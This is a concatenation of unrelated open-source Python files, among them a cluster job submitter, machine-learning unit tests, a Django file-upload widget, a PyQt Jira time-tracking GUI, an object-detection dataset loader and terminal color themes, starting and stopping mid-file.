if s3[i-1] == s1[i-1] and table[0][i-1] == True:
table[0][i] = True
for i in range (1, n+1):
if s3[i-1] == s2[i-1] and table[i-1][0] == True:
table[i][0] = True
for i in range (1, n+1):
for j in range(1, m+1):
if s3[i+j-1] == s2[i-1] and table[i-1][j] == True:
table[i][j] = True
if s3[i+j-1] == s1[j-1] and table[i][j-1] == True:
table[i][j] = True
return table[n][m] |
scripts/job/memcached_submit.py | Container-Projects/firmament | 287 | 30425 | from base import job_desc_pb2
from base import task_desc_pb2
from base import reference_desc_pb2
from google.protobuf import text_format
import httplib, urllib, re, sys, random
import binascii
import time
import shlex
def add_worker_task(job_name, task, binary, args, worker_id, num_workers, extra_args):
task.uid = 0
task.name = "%s/%d" % (job_name, worker_id)
task.state = task_desc_pb2.TaskDescriptor.CREATED
task.binary = "/usr/bin/python"
task.args.extend(args)
task.args.append(str(worker_id))
task.args.append(str(num_workers))
task.args.append(binary)
task.args.extend(extra_args)
task.inject_task_lib = True
if len(sys.argv) < 4:
print "usage: memcached_submit.py <coordinator hostname> <web UI port> " \
"<task binary> [<args>] [<num workers>] [<job name>]"
sys.exit(1)
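# Example invocation (host, port and paths below are placeholders, not defaults):
#   python memcached_submit.py coordinator-host 8080 /usr/bin/memcached "-m 64" 4 my_memcached_job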
hostname = sys.argv[1]
port = int(sys.argv[2])
memcached_exe = sys.argv[3]
if len(sys.argv) > 4:
extra_args = shlex.split(sys.argv[4])
else:
extra_args = []
if len(sys.argv) > 5:
num_workers = int(sys.argv[5])
else:
num_workers = 1
if len(sys.argv) > 6:
job_name = sys.argv[6]
else:
job_name = "memcached_job_at_%d" % (int(time.time()))
basic_args = []
basic_args.append("/home/srguser/firmament-experiments/helpers/napper/napper_memcached.py")
basic_args.append("caelum-301:2181")
basic_args.append(job_name)
job_desc = job_desc_pb2.JobDescriptor()
job_desc.uuid = "" # UUID will be set automatically on submission
job_desc.name = job_name
# set up root task
job_desc.root_task.uid = 0
job_desc.root_task.name = job_name + "/0"
job_desc.root_task.state = task_desc_pb2.TaskDescriptor.CREATED
job_desc.root_task.binary = "/usr/bin/python"
job_desc.root_task.args.extend(basic_args)
job_desc.root_task.args.append("0") # root task is worker ID 0
job_desc.root_task.args.append(str(num_workers))
job_desc.root_task.args.append(memcached_exe)
job_desc.root_task.args.extend(extra_args)
job_desc.root_task.inject_task_lib = True
# add workers
for i in range(1, num_workers):
task = job_desc.root_task.spawned.add()
add_worker_task(job_name, task, memcached_exe, basic_args, i, num_workers, extra_args)
input_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
output_id = binascii.unhexlify('db33daba280d8e68eea6e490723b02cedb33daba280d8e68eea6e490723b02ce')
output2_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
job_desc.output_ids.append(output_id)
job_desc.output_ids.append(output2_id)
input_desc = job_desc.root_task.dependencies.add()
input_desc.id = input_id
input_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
input_desc.type = reference_desc_pb2.ReferenceDescriptor.CONCRETE
input_desc.non_deterministic = False
input_desc.location = "blob:/tmp/fib_in"
final_output_desc = job_desc.root_task.outputs.add()
final_output_desc.id = output_id
final_output_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output_desc.non_deterministic = True
final_output_desc.location = "blob:/tmp/out1"
final_output2_desc = job_desc.root_task.outputs.add()
final_output2_desc.id = output2_id
final_output2_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output2_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output2_desc.non_deterministic = True
final_output2_desc.location = "blob:/tmp/out2"
#params = urllib.urlencode({'test': text_format.MessageToString(job_desc)})
params = 'jd=%s' % text_format.MessageToString(job_desc)
print "SUBMITTING job with parameters:"
print params
print ""
try:
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("%s:%s" % (hostname, port))
conn.request("POST", "/job/submit/", params, headers)
response = conn.getresponse()
except Exception as e:
print "ERROR connecting to coordinator: %s" % (e)
sys.exit(1)
data = response.read()
match = re.search(r"([0-9a-f\-]+)", data, re.MULTILINE | re.S | re.I | re.U)
print "----------------------------------------------"
if match and response.status == 200:
job_id = match.group(1)
print "JOB SUBMITTED successfully!\nJOB ID is %s\nStatus page: " \
"http://%s:%d/job/status/?id=%s" % (job_id, hostname, port, job_id)
else:
print "ERROR submitting job -- response was: %s (Code %d)" % (response.reason,
response.status)
print "----------------------------------------------"
conn.close()
|
refinery/bnpy/bnpy-dev/tests/merge/TestMergeHDPTopicModel.py | csa0001/Refinery | 103 | 30478 | '''
Unit tests for MergeMove.py for HDPTopicModels
Verifies that merging works as expected and produces valid models.
Attributes
------------
self.Data : K=4 simple WordsData object from AbstractBaseTestForHDP
self.hmodel : K=4 simple bnpy model from AbstractBaseTestForHDP
Coverage
-----------
* run_many_merge_moves
* fails to merge away any true comps
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
* run_merge_move
* fails to merge away any true comps
* successfully merges away all duplicated comps when targeted specifically
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
success rate > 95%
'''
import numpy as np
import unittest
from AbstractBaseTestForHDP import AbstractBaseTestForHDP
import bnpy
from bnpy.learnalg import MergeMove
from scipy.special import digamma
import copy
class TestMergeHDP(AbstractBaseTestForHDP):
def getSuffStatsPrepForMerge(self, hmodel):
''' With merge flats ENABLED,
run Estep, calc suff stats, then do an Mstep
'''
LP = hmodel.calc_local_params(self.Data)
flagDict = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
SS = hmodel.get_global_suff_stats(self.Data, LP, **flagDict)
hmodel.update_global_params(SS)
return LP, SS
######################################################### Test many moves
#########################################################
def test_run_many_merge_moves_trueModel_random(self):
LP, SS = self.getSuffStatsPrepForMerge(self.hmodel)
PRNG = np.random.RandomState(0)
mergeKwArgs = dict(mergename='random')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.hmodel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
assert MTracker.nTrial == SS.K * (SS.K-1)/2
assert MTracker.nSuccess == 0
def test_run_many_merge_moves_dupModel_random(self):
self.MakeModelWithDuplicatedComps()
LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
PRNG = np.random.RandomState(0)
mergeKwArgs = dict(mergename='random')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
assert MTracker.nSuccess == 4
assert (0,4) in MTracker.acceptedOrigIDs
assert (1,5) in MTracker.acceptedOrigIDs
assert (2,6) in MTracker.acceptedOrigIDs
assert (3,7) in MTracker.acceptedOrigIDs
def test_run_many_merge_moves_dupModel_marglik(self):
self.MakeModelWithDuplicatedComps()
LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
PRNG = np.random.RandomState(456)
mergeKwArgs = dict(mergename='marglik')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
for msg in MTracker.InfoLog:
print msg
assert MTracker.nSuccess == 4
assert MTracker.nTrial == 4
assert (0,4) in MTracker.acceptedOrigIDs
assert (1,5) in MTracker.acceptedOrigIDs
assert (2,6) in MTracker.acceptedOrigIDs
assert (3,7) in MTracker.acceptedOrigIDs
######################################################### run_merge_move
######################################################### full tests
def test_model_matches_ground_truth_as_precheck(self):
''' Verify HDPmodel is able to learn ground truth parameters
and maintain stable estimates after several E/M steps
'''
np.set_printoptions(precision=3,suppress=True)
# Advance the model several iterations
for rr in range(5):
self.run_Estep_then_Mstep()
for k in range(self.hmodel.obsModel.K):
logtopicWordHat = self.hmodel.obsModel.comp[k].Elogphi
topicWordHat = np.exp(logtopicWordHat)
diffVec = np.abs(topicWordHat - self.Data.TrueParams['topics'][k])
print diffVec
print ' '
assert np.max(diffVec) < 0.04
######################################################### run_merge_move
######################################################### full tests
def test_run_merge_move_on_true_comps_fails(self):
''' Should not be able to merge "true" components into one another
Each is necessary to explain (some) data
'''
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.hmodel.calc_local_params(self.Data)
SS = self.hmodel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for trial in range(10):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.hmodel, self.Data, SS, mergename='random')
assert newModel.allocModel.K == self.hmodel.allocModel.K
assert newModel.obsModel.K == self.hmodel.obsModel.K
def test_run_merge_move_on_dup_comps_succeeds_with_each_ideal_pair(self):
''' Given the duplicated comps model,
which has a redundant copy of each "true" component,
We show that deliberately merging each pair does succeed.
This is "ideal" since we know in advance which merge pair to try
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for kA in [0,1,2,3]:
kB = kA + 4 # Ktrue=4, so kA's best match is kA+4
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert newModel.allocModel.K == self.dupModel.allocModel.K - 1
assert newModel.obsModel.K == self.dupModel.obsModel.K - 1
assert MoveInfo['didAccept'] == 1
def test_run_merge_move_on_dup_comps_fails_with_nonideal_pairs(self):
''' Given the duplicated comps model,
which has a redundant copy of each "true" component,
        We show that deliberately merging pairs that are not copies of the same
        true component is always rejected.
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for Kstep in [1,2,3,5,6,7]:
for kA in range(8 - Kstep):
kB = kA + Kstep
newM, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert MoveInfo['didAccept'] == 0
def test_run_merge_move_on_dup_comps_succeeds_with_all_ideal_pairs(self):
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
myModel = self.dupModel.copy()
for kA in [3,2,1,0]: # descend backwards so indexing still works
kB = kA + 4 # Ktrue=4, so kA's best match is kA+4
myModel, SS, newEv, MoveInfo = MergeMove.run_merge_move(myModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert MoveInfo['didAccept'] == 1
def test_run_merge_move_on_dup_comps_succeeds_with_random_choice(self):
''' Consider Duplicated Comps model.
Out of (8 choose 2) = 28 possible pairs,
exactly 4 produce sensible merges.
Verify that over many random trials where kA,kB drawn uniformly,
we obtain a success rate not too different from 4 / 28 = 0.142857
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
nTrial = 100
nSuccess = 0
PRNG = np.random.RandomState(0)
for trial in range(nTrial):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='random', randstate=PRNG)
if MoveInfo['didAccept']:
print MoveInfo['msg']
nSuccess += 1
assert nSuccess > 0
rate = float(nSuccess)/float(nTrial)
print "Expected rate: .1428"
print "Measured rate: %.3f" % (rate)
assert rate > 0.1
assert rate < 0.2
def test_run_merge_move_on_dup_comps_succeeds_with_marglik_choice(self):
''' Consider Duplicated Comps model.
Use marglik criteria to select candidates kA, kB.
Verify that the merge accept rate is much higher than at random.
The accept rate should actually be near perfect!
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
nTrial = 100
nSuccess = 0
PRNG = np.random.RandomState(0)
for trial in range(nTrial):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='marglik', randstate=PRNG)
print MoveInfo['msg']
if MoveInfo['didAccept']:
nSuccess += 1
assert nSuccess > 0
rate = float(nSuccess)/float(nTrial)
print "Expected rate: >.95"
print "Measured rate: %.3f" % (rate)
assert rate > 0.95
|
test/run/t242.py | timmartin/skulpt | 2,671 | 30498 | class O(object): pass
class A(O): pass
class B(O): pass
class C(O): pass
class D(O): pass
class E(O): pass
class K1(A,B,C): pass
class K2(D,B,E): pass
class K3(D,A): pass
class Z(K1,K2,K3): pass
print K1.__mro__
print K2.__mro__
print K3.__mro__
print Z.__mro__
|
tests/cases/infer.py | div72/py2many | 345 | 30502 | <filename>tests/cases/infer.py
#!/usr/bin/env python3
def foo():
a = 10
# infer that b is an int
b = a
assert b == 10
print(b)
if __name__ == "__main__":
foo()
|
fnss/traffic/__init__.py | brucespang/fnss | 114 | 30520 | """Tools for creating and manipulating event schedules and traffic matrices"""
from fnss.traffic.eventscheduling import *
from fnss.traffic.trafficmatrices import *
|
djng/forms/widgets.py | ParikhKadam/django-angular | 941 | 30522 | import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
signer = signing.Signer()
def __init__(self, area_label, fileupload_url, attrs=None):
self.area_label = area_label
self.fileupload_url = fileupload_url
super(DropFileWidget, self).__init__(attrs)
self.filetype = 'file'
def render(self, name, value, attrs=None, renderer=None):
from django.contrib.staticfiles.storage import staticfiles_storage
extra_attrs = dict(attrs)
extra_attrs.update({
'name': name,
'class': 'djng-{}-uploader'.format(self.filetype),
'djng-fileupload-url': self.fileupload_url,
'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
})
self.update_attributes(extra_attrs, value)
final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
        # add a spinning wheel
spinner_attrs = {
'class': 'glyphicon glyphicon-refresh glyphicon-spin',
'ng-cloak': True,
}
elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
# add a delete icon
icon_attrs = {
'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
'class': 'djng-btn-trash',
'title': _("Delete File"),
'djng-fileupload-button ': True,
'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
'ng-cloak': True,
}
elements.append(format_html('<img {} />', flatatt(icon_attrs)))
# add a download icon
if value:
download_attrs = {
'href': value.url,
'class': 'djng-btn-download',
'title': _("Download File"),
'download': True,
'ng-cloak': True,
}
download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))
def update_attributes(self, attrs, value):
if value:
try:
content_type, _ = mimetypes.guess_type(value.file.name)
extension = mimetypes.guess_extension(content_type)[1:]
except (IOError, IndexError, TypeError):
extension = '_blank'
background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
class DropImageWidget(DropFileWidget):
def __init__(self, area_label, fileupload_url, attrs=None):
super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
self.filetype = 'image'
def update_attributes(self, attrs, value):
if value:
background_url = self.get_background_url(value)
if background_url:
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
def get_background_url(self, value):
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
try:
thumbnailer = get_thumbnailer(value)
thumbnail = thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)
return thumbnail.url
except InvalidImageFormatError:
return
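# Illustrative usage sketch (the form, field name and upload URL below are
# assumptions for the example, not part of django-angular itself):
#
#   from django import forms
#
#   class ProfileForm(forms.Form):
#       avatar = forms.ImageField(
#           widget=DropImageWidget(
#               area_label="Drop image here or click to browse",
#               fileupload_url="/upload/"))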
|
parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | 117 | 30525 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import json
import io
import sys
import traceback
import webbrowser
from contextlib import redirect_stdout
from datetime import datetime
from PyQt5.Qt import (
QApplication, QMessageBox, QThread, pyqtSignal, QMainWindow, QPushButton, QCheckBox, QPlainTextEdit,
QVBoxLayout, QHBoxLayout, QTextOption, QTableWidget, QWidget, QSizePolicy, QSplitter, Qt, QTableWidgetItem,
QProgressDialog, QHeaderView, QSystemTrayIcon, QIcon, QEvent, QTimer
)
from main import (
DIR, get_rss_jira_log, parse_logged_dict, get_logged_list_by_now_utc_date, get_logged_total_seconds,
get_sorted_logged, seconds_to_str
)
def log_uncaught_exceptions(ex_cls, ex, tb):
text = f'{ex_cls.__name__}: {ex}:\n'
text += ''.join(traceback.format_tb(tb))
print(text)
QMessageBox.critical(None, 'Error', text)
sys.exit(1)
sys.excepthook = log_uncaught_exceptions
class RunFuncThread(QThread):
run_finished = pyqtSignal(object)
def __init__(self, func):
super().__init__()
self.func = func
def run(self):
self.run_finished.emit(self.func())
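# Illustrative usage (this mirrors how refresh() below uses the thread):
#   thread = RunFuncThread(func=some_blocking_call)
#   thread.run_finished.connect(on_result)
#   thread.start()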
WINDOW_TITLE = 'parse_jira_logged_time'
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle(WINDOW_TITLE)
file_name = str(DIR / 'favicon.ico')
icon = QIcon(file_name)
self.setWindowIcon(icon)
self.tray = QSystemTrayIcon(icon)
self.tray.setToolTip(self.windowTitle())
self.tray.activated.connect(self._on_tray_activated)
self.tray.show()
self.logged_dict = dict()
self.pb_refresh = QPushButton('REFRESH')
self.pb_refresh.clicked.connect(self.refresh)
self.cb_show_log = QCheckBox()
self.cb_show_log.setChecked(True)
self.log = QPlainTextEdit()
self.log.setReadOnly(True)
self.log.setWordWrapMode(QTextOption.NoWrap)
log_font = self.log.font()
log_font.setFamily('Courier New')
self.log.setFont(log_font)
self.cb_show_log.clicked.connect(self.log.setVisible)
self.log.setVisible(self.cb_show_log.isChecked())
header_labels = ['DATE', 'TOTAL LOGGED TIME']
self.table_logged = QTableWidget()
self.table_logged.setEditTriggers(QTableWidget.NoEditTriggers)
self.table_logged.setSelectionBehavior(QTableWidget.SelectRows)
self.table_logged.setSelectionMode(QTableWidget.SingleSelection)
self.table_logged.setColumnCount(len(header_labels))
self.table_logged.setHorizontalHeaderLabels(header_labels)
self.table_logged.horizontalHeader().setStretchLastSection(True)
self.table_logged.itemClicked.connect(self._on_table_logged_item_clicked)
header_labels = ['TIME', 'LOGGED', 'JIRA']
self.table_logged_info = QTableWidget()
self.table_logged_info.setEditTriggers(QTableWidget.NoEditTriggers)
self.table_logged_info.setSelectionBehavior(QTableWidget.SelectRows)
self.table_logged_info.setSelectionMode(QTableWidget.SingleSelection)
self.table_logged_info.setColumnCount(len(header_labels))
self.table_logged_info.setHorizontalHeaderLabels(header_labels)
self.table_logged_info.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)
self.table_logged_info.horizontalHeader().setStretchLastSection(True)
self.table_logged_info.itemDoubleClicked.connect(self._on_table_logged_info_item_double_clicked)
main_layout = QVBoxLayout()
central_widget = QWidget()
central_widget.setLayout(main_layout)
self.setCentralWidget(central_widget)
self.pb_refresh.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred))
h_layout = QHBoxLayout()
h_layout.addWidget(self.pb_refresh)
h_layout.addWidget(self.cb_show_log)
layout_table_widget = QVBoxLayout()
layout_table_widget.setContentsMargins(0, 0, 0, 0)
layout_table_widget.addWidget(self.table_logged)
layout_table_widget.addWidget(self.table_logged_info)
table_widget = QWidget()
table_widget.setLayout(layout_table_widget)
splitter = QSplitter(Qt.Horizontal)
splitter.addWidget(table_widget)
splitter.addWidget(self.log)
main_layout.addLayout(h_layout)
main_layout.addWidget(splitter)
def _fill_tables(self, xml_data: bytes):
buffer_io = io.StringIO()
try:
with redirect_stdout(buffer_io):
print(len(xml_data), repr(xml_data[:50]))
                # The document structure is XML
self.logged_dict = parse_logged_dict(xml_data)
print(self.logged_dict)
if not self.logged_dict:
return
print(json.dumps(self.logged_dict, indent=4, ensure_ascii=False))
print()
logged_list = get_logged_list_by_now_utc_date(self.logged_dict)
logged_total_seconds = get_logged_total_seconds(logged_list)
logged_total_seconds_str = seconds_to_str(logged_total_seconds)
print('entry_logged_list:', logged_list)
print('today seconds:', logged_total_seconds)
print('today time:', logged_total_seconds_str)
print()
                # Print the result as a table for readability
lines = []
                # Remove existing rows from the table
while self.table_logged.rowCount():
self.table_logged.removeRow(0)
for i, (date_str, logged_list) in enumerate(get_sorted_logged(self.logged_dict)):
total_seconds = get_logged_total_seconds(logged_list)
total_seconds_str = seconds_to_str(total_seconds)
row = date_str, total_seconds_str, total_seconds
lines.append(row)
self.table_logged.setRowCount(self.table_logged.rowCount() + 1)
self.table_logged.setItem(i, 0, QTableWidgetItem(date_str))
item = QTableWidgetItem(total_seconds_str)
item.setToolTip('Total seconds: {}'.format(total_seconds))
self.table_logged.setItem(i, 1, item)
self.table_logged.setCurrentCell(0, 0)
self.table_logged.setFocus()
self._on_table_logged_item_clicked(self.table_logged.currentItem())
                # Transpose the rows into columns and compute the maximum width of each column
max_len_columns = [max(map(len, map(str, col))) for col in zip(*lines)]
                # Build the format string: [30, 14, 5] -> "{:<30} | {:<14} | {:<5}"
my_table_format = ' | '.join('{:<%s}' % max_len for max_len in max_len_columns)
for line in lines:
print(my_table_format.format(*line))
finally:
text = buffer_io.getvalue()
self.log.setPlainText(text)
print(text)
def refresh(self):
progress_dialog = QProgressDialog(self)
thread = RunFuncThread(func=get_rss_jira_log)
thread.run_finished.connect(self._fill_tables)
thread.run_finished.connect(progress_dialog.close)
thread.start()
progress_dialog.setWindowTitle('Please wait...')
progress_dialog.setLabelText(progress_dialog.windowTitle())
progress_dialog.setRange(0, 0)
progress_dialog.exec()
self.setWindowTitle(WINDOW_TITLE + ". Last refresh date: " + datetime.now().strftime('%d/%m/%Y %H:%M:%S'))
def _on_table_logged_item_clicked(self, item: QTableWidgetItem):
        # Remove existing rows from the table
while self.table_logged_info.rowCount():
self.table_logged_info.removeRow(0)
row = item.row()
date_str = self.table_logged.item(row, 0).text()
logged_list = self.logged_dict[date_str]
logged_list = reversed(logged_list)
for i, logged in enumerate(logged_list):
self.table_logged_info.setRowCount(self.table_logged_info.rowCount() + 1)
self.table_logged_info.setItem(i, 0, QTableWidgetItem(logged['time']))
self.table_logged_info.setItem(i, 1, QTableWidgetItem(logged['logged_human_time']))
item = QTableWidgetItem(logged['jira_id'])
item.setToolTip(logged['jira_title'])
self.table_logged_info.setItem(i, 2, item)
def _on_table_logged_info_item_double_clicked(self, item: QTableWidgetItem):
row = item.row()
jira_id = self.table_logged_info.item(row, 2).text()
url = 'https://jira.compassplus.ru/browse/' + jira_id
webbrowser.open(url)
def _on_tray_activated(self, reason):
self.setVisible(not self.isVisible())
if self.isVisible():
self.showNormal()
self.activateWindow()
def changeEvent(self, event: QEvent):
if event.type() == QEvent.WindowStateChange:
            # If the window was minimized
if self.isMinimized():
                # Hide the window from the taskbar
QTimer.singleShot(0, self.hide)
if __name__ == '__main__':
app = QApplication([])
mw = MainWindow()
mw.resize(1200, 800)
mw.show()
mw.refresh()
app.exec()
|
applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 260 | 30527 | <reponame>payoto/graphcore_examples
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
# Copyright 2021 RangiLyu.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been modified by Graphcore Ltd.
import numpy as np
import torch
from .xml_dataset import XMLDataset
from utils import logger
if logger.GLOBAL_LOGGER is not None:
print = logger.GLOBAL_LOGGER.log_str
def calc_area(boxes):
    # boxes: (n, 4) array of [x1, y1, x2, y2]
    # returns: (n,) array of box areas
x1, y1, x2, y2 = np.split(boxes, 4, 1)
areas = (y2 - y1) * (x2 - x1) # n,1
return areas[:, 0]
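# Quick illustrative check of calc_area (not part of the original file):
#   calc_area(np.array([[0, 0, 2, 3]])) -> array([6]), i.e. (y2 - y1) * (x2 - x1) = 3 * 2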
class XMLDatasetForRcnn(XMLDataset):
def __init__(self,
preset_indices=None,
area_filter_thrd=0.0,
num_gtboxes=20,
specified_length=None,
extra_layer=None,
**kwargs):
self.area_filter_thrd = area_filter_thrd
self.num_gtboxes = num_gtboxes
self.preset_indices = preset_indices
self._cur_for_preset_indices = 0
super(XMLDatasetForRcnn, self).__init__(**kwargs)
self.real_length = len(self.data_info)
self.length = self.real_length * 2 if specified_length is None else specified_length
self.extra_layer = extra_layer
def get_train_data(self, idx):
"""
Load image and annotation
:param idx:
:return: meta-data (a dict containing image, annotation and other information)
filter zero area boxes
"""
if self.preset_indices is None:
pass
else:
idx = self.preset_indices[self._cur_for_preset_indices]
self._cur_for_preset_indices += 1
idx = int(idx % self.real_length)
meta = super().get_train_data(idx)
# filter boxes and labels by area
areas = calc_area(meta['gt_bboxes'])
mask = areas > self.area_filter_thrd
meta['gt_bboxes'] = meta['gt_bboxes'][mask, :]
meta['gt_labels'] = meta['gt_labels'][mask]
meta['db_inds'] = idx
#
# pad boxes and inds
boxes = np.zeros((self.num_gtboxes, 4)).astype(np.float32)
num_boxes = meta['gt_bboxes'].shape[0]
boxes[:num_boxes, :] = meta['gt_bboxes'][:self.num_gtboxes]
meta['gt_bboxes'] = torch.from_numpy(boxes)
labels = np.asarray([0] * self.num_gtboxes)
labels[:num_boxes] = meta['gt_labels'][:self.num_gtboxes]
meta['gt_labels'] = torch.from_numpy(labels)
meta['num_boxes'] = num_boxes
if num_boxes == 0:
return None # return None will re-run this function
# proc data in extra layer
if self.extra_layer is not None:
meta = self.extra_layer(meta)
return meta
def __len__(self):
return self.length
|
spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 169 | 30540 | <filename>spyder_terminal/widgets/style/themes.py
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see LICENSE.txt for details)
# -----------------------------------------------------------------------------
ANSI_COLORS = {
'emacs': {
'black': '#000000',
'red': '#800000',
'green': '#005100',
'yellow': '#abab67',
'blue': '#151d51',
'magenta': '#510051',
'cyan': '#105151',
'white': '#ffffff',
'brightBlack': '#555555',
'brightRed': '#c80000',
'brightGreen': '#00aa00',
'brightYellow': '#cbcb7b',
'brightBlue': '#3c51e8',
'brightMagenta': '#900090',
'brightCyan': '#20a7a7',
'brightWhite': '#ffffff'
},
'idle': {
'black': '#ffffff',
'red': '#8a0000',
'green': '#008a00',
'yellow': '#8a4000',
'blue': '#00008a',
'magenta': '#5a005a',
'cyan': '#105151',
'white': '#ffffff',
'brightBlack': '#555555',
'brightRed': '#dd0000',
'brightGreen': '#00aa00',
'brightYellow': '#ff7700',
'brightBlue': '#0000ff',
'brightMagenta': '#900090',
'brightCyan': '#20a7a7',
'brightWhite': '#ffffff'
},
'monokai': {
'black': '#48483e',
'red': '#dc2566',
'green': '#8fc029',
'yellow': '#d4c96e',
'blue': '#55bcce',
'magenta': '#9358fe',
'cyan': '#56b7a5',
'white': '#f8f8f2',
'brightBlack': '#76715e',
'brightRed': '#fa2772',
'brightGreen': '#a7e22e',
'brightYellow': '#e7db75',
'brightBlue': '#66d9ee',
'brightMagenta': '#ae82ff',
'brightCyan': '#66efd5',
'brightWhite': '#f9f8f5'
},
'pydev': {
'black': '#ffffff',
'red': '#800000',
'green': '#00aa00',
'yellow': '#ffff99',
'blue': '#0000ff',
'magenta': '#900090',
'cyan': '#007f7f',
'white': '#efefef',
'brightBlack': '#c0c0c0',
'brightRed': '#c10000',
'brightGreen': '#00cc00',
'brightYellow': '#fff569',
'brightBlue': '#015aff',
'brightMagenta': '#bf00bf',
'brightCyan': '#00a5a5',
'brightWhite': '#ffffff'
},
'scintilla': {
'black': '#ffffff',
'red': '#800000',
'green': '#007f00',
'yellow': '#ffff99',
'blue': '#00007f',
'magenta': '#7f007f',
'cyan': '#007f7f',
'white': '#efefef',
'brightBlack': '#adadad',
'brightRed': '#c10000',
'brightGreen': '#00ab00',
'brightYellow': '#fff569',
'brightBlue': '#0000ff',
'brightMagenta': '#be00be',
'brightCyan': '#00a5a5',
'brightWhite': '#ffffff'
},
'spyder': {
'black': '#ffffff',
'red': '#800000',
